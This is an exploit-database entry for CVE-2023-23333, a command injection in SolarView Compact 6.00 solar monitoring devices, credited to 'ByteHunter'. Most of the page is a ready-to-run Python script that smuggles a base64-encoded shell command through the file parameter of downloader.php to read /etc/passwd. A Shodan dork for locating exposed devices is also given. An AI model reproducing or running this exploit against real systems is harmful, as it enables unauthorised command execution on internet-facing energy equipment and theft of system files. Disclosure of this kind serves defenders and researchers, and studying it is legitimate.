SolarView Compact 6.00 Command Injection

2024.03.20

Credit: ByteHunter

Risk: High

Local: No

Remote: Yes

CVE: CVE-2023-23333

CWE: CWE-78

Dork: http.html:"solarview compact"

#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333
import argparse
import requests
def vuln_check(ip_address, port):
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
response = requests.get(url)
if response.status_code == 200:
output = response.text
if "root" in output:
print("Vulnerability detected: Command Injection possible.")
print(f"passwd file content:\n{response.text}")
else:
print("No vulnerability detected.")
else:
print("Error: Unable to fetch response.")
def main():
parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
args = parser.parse_args()
ip_address = args.ip
port = args.port
vuln_check(ip_address, port)
if __name__ == "__main__":
main()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SolarView Compact 6.00 Command Injection

Dork: http.html:"solarview compact"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.